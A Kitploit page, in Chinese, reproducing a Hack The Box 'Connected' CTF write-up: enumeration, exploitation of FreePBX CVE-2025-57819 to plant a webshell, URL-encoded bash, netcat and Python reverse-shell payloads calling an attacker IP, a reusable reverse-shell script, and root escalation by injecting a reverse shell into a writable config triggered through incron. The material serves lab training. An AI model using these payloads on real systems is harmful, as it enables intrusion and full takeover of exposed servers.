Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
htb-labs-connected — Hack The Box Connected 机器 write-up,涵盖枚举、CVE-2025-57819 漏洞利用、反弹 shell,以及通过 FreePBX 和 incron 提权至 root。 | Kitploit
工具/GitHubGitHub/diegorivas1/htb-labs-connected
权限提升漏洞分析漏洞利用逆向工程Web应用程序漏洞利用信息收集CTF渗透测试学习与教育Payload 开发
GitHubdiegorivas1/htb-labs-connected

htb-labs-connected

18小时17分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Hack The Box Connected 机器 write-up,涵盖枚举、CVE-2025-57819 漏洞利用、反弹 shell,以及通过 FreePBX 和 incron 提权至 root。

查看仓库

HTB: Connected - 员工精选

English | Español

HTB Difficulty OS Platform

📋 目录

  1. 信息收集
  2. 漏洞利用 - CVE-2025-57819
  3. 反弹 Shell
  4. 权限提升
  5. Flag
  6. 仓库结构
  7. 使用的脚本和工具
  8. 攻击流程总结
  9. 参考资料与致谢
  10. 补充说明

1. 信息收集

1.1 使用 Nmap 进行端口扫描

root@kitploit:~
nmap -sV 10.129.81.130

结果:

root@kitploit:~
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http      Apache httpd 2.4.6 (CentOS) PHP/7.4.16
443/tcp open  ssl/https Apache/2.4.6 (CentOS) PHP/7.4.16

1.2 将域名添加到 /etc/hosts

root@kitploit:~
echo "10.129.81.130 connected.htb" >> /etc/hosts

1.3 使用 Gobuster 进行目录爆破

root@kitploit:~
gobuster dir -u http://connected.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

关键发现:

  • /admin - FreePBX 管理面板
  • /ucp - 用户控制面板
  • /robots.txt - Robots 文件

2. 漏洞利用 - CVE-2025-57819

2.1 下载漏洞利用脚本

克隆 WatchTowr Labs 仓库:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819.git
cd watchTowr-vs-FreePBX-CVE-2025-57819

2.2 运行漏洞利用脚本

root@kitploit:~
python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://connected.htb

预期输出:

root@kitploit:~
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=hostname

2.3 验证 Webshell

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=whoami"

结果:

root@kitploit:~
asterisk

3. 反弹 Shell

3.1 在 Kali 上启动监听器

root@kitploit:~
nc -lvnp 4444

3.2 注入反弹 Shell

编码版本:

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.234%2F4444%200%3E%261%27"

注意: 将 10.10.14.234 替换为你的 VPN IP。

3.3 替代方案

Netcat

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=nc%20-e%20/bin/bash%2010.10.14.234%204444"

Python

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.14.234%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bsubprocess.call([%22/bin/bash%22%2C%22-i%22])%27"

3.4 获取 Shell

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 55944
bash: no job control in this shell
[asterisk@connected html]$

4. 权限提升

4.1 查找可写的配置文件

root@kitploit:~
find /etc -name "*.conf" -writable 2>/dev/null

关键结果:

root@kitploit:~
/etc/dahdi/init.conf

4.2 检查 incron.d

root@kitploit:~
cat /etc/incron.d/*

相关条目:

root@kitploit:~
/var/spool/asterisk/sysadmin/dahdi_restart IN_CLOSE_WRITE /usr/sbin/sysadmin_dahdi_restart

4.3 将反弹 Shell 添加到 init.conf

root@kitploit:~
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.234/4545 0>&1"' >> /etc/dahdi/init.conf

4.4 启动 Root Shell 监听器

root@kitploit:~
nc -lvnp 4545

4.5 触发服务重启

root@kitploit:~
echo "Restart" >> /var/spool/asterisk/sysadmin/dahdi_restart

4.6 获取 Root Shell

root@kitploit:~
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 45996
bash: no job control in this shell
[root@connected /]#

4.7 验证 Root 权限

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

5. Flag

5.1 用户 Flag

root@kitploit:~
cat /home/asterisk/user.txt
root@kitploit:~
HTB{...user_flag...}

5.2 Root Flag

root@kitploit:~
cat /root/root.txt
root@kitploit:~
HTB{...root_flag...}

Flag 已有意从本仓库中省略。


6. 仓库结构

root@kitploit:~
htb-labs-connected/
├── README.md
├── README-ES.md
├── exploits/
│   ├── watchTowr-vs-FreePBX-CVE-2025-57819/
│   ├── CVE-2025-57819-exploit/
│   └── CVE-2025-57819-poc/
├── payloads/
│   └── reverse_shell.sh
├── scans/
│   ├── nmap_scan.txt
│   └── gobuster_results.txt
├── screenshots/
└── flags/

7. 使用的脚本和工具

7.1 反弹 Shell 脚本

文件: payloads/reverse_shell.sh

root@kitploit:~
#!/bin/bash

# Reverse shell for HTB Connected
# Usage: ./reverse_shell.sh 10.10.14.234 4444

IP=$1
PORT=$2

if [ -z "$IP" ] || [ -z "$PORT" ]; then
    echo "Usage: $0 <IP> <PORT>"
    exit 1
fi

bash -c "bash -i >& /dev/tcp/$IP/$PORT 0>&1"

7.2 信息收集命令

文件: scans/nmap_scan.txt

root@kitploit:~
# Full port scan
nmap -sV -p- -T4 10.129.81.130

# Service and default script scan
nmap -sC -sV -p22,80,443 10.129.81.130

7.3 爆破命令

文件: scans/gobuster_results.txt

root@kitploit:~
# Directory fuzzing
gobuster dir \
    -u http://connected.htb \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html

# Fuzzing the admin directory
gobuster dir \
    -u http://connected.htb/admin \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html,conf,ini,bak

8. 攻击流程总结


9. 参考资料与致谢

  • 原始 Writeup: CyberSaif
  • WatchTowr Labs 漏洞利用脚本: GitHub
  • CVE-2025-57819: SentinelOne
  • FreePBX 安全公告: GitHub

10. 补充说明

10.1 如果 Webshell 未创建

  • 等待完整的 2 分钟;漏洞利用脚本需要时间创建工件。
  • 验证连接:
root@kitploit:~
curl -k https://connected.htb

10.2 如果监听器无法工作

检查你的 VPN 接口:

root@kitploit:~
ip addr show tun0

如有必要,尝试其他监听端口:

root@kitploit:~
4445
8080
1234

10.3 目标上的关键文件

  • /etc/dahdi/init.conf - 权限提升期间使用的可写配置文件
  • /etc/incron.d/ - incron 配置目录
  • /var/spool/asterisk/sysadmin/dahdi_restart - 用于触发重启操作的触发器
  • /var/www/html/ - Web 服务器文档根目录

🏁 结论

Connected 已成功完成。 ✅

该攻击链展示了暴露的 FreePBX 实例如何通过 CVE-2025-57819 实现初始访问,随后通过可写配置文件和基于 incron 的触发器实现权限提升。

下载工具
步骤操作结果
1Nmap发现端口 22、80 和 443 开放
2Gobuster发现 /admin、/ucp、/robots.txt
3CVE-2025-57819以 asterisk 身份获取 Webshell
4反弹 Shell以 asterisk 身份获取交互式 Shell
5权限提升incron.d → dahdi_restart → init.conf
6Root获取 Root Shell